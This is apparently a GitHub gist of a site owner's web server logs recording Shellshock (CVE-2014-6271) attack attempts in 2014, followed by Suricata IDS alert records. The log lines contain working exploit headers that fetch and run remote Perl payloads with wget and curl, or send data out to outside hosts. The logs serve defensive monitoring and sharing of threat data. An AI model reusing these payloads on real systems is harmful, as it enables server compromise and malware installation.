Skip to content

Instantly share code, notes, and snippets.

@Oneiroi

Oneiroi/62.210.75.170_2014-09-29_attempt_access.log

Last active August 29, 2015 14:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Oneiroi/6a89d8957077f45ce18f to your computer and use it in GitHub Desktop.
Save Oneiroi/6a89d8957077f45ce18f to your computer and use it in GitHub Desktop.
Download ZIP
shellshock_logs
Raw
62.210.75.170_2014-09-29_attempt_access.log
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
Raw
shellshock logs
209.126.230.72 - - [25/Sep/2014:02:03:16 +0000] "GET / HTTP/1.0" 793 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
166.78.61.142 - - [25/Sep/2014:11:33:48 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
93.103.21.231 - - [26/Sep/2014:00:37:45 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://oneiroi.co.uk/'"
91.200.84.22 - - [26/Sep/2014:08:36:58 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=oneiroi.co.uk -O /tmp/a.pl\x22"
146.71.113.194 - - [26/Sep/2014:09:12:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
94.102.60.177 - - [26/Sep/2014:14:09:31 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { x;};echo;echo 123456ololo | md5sum"
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET / HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
83.166.234.133 - - [27/Sep/2014:03:13:23 +0000] "GET / HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://oneiroi.co.uk/\x22"
Raw
suricata_extract_eve.json
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
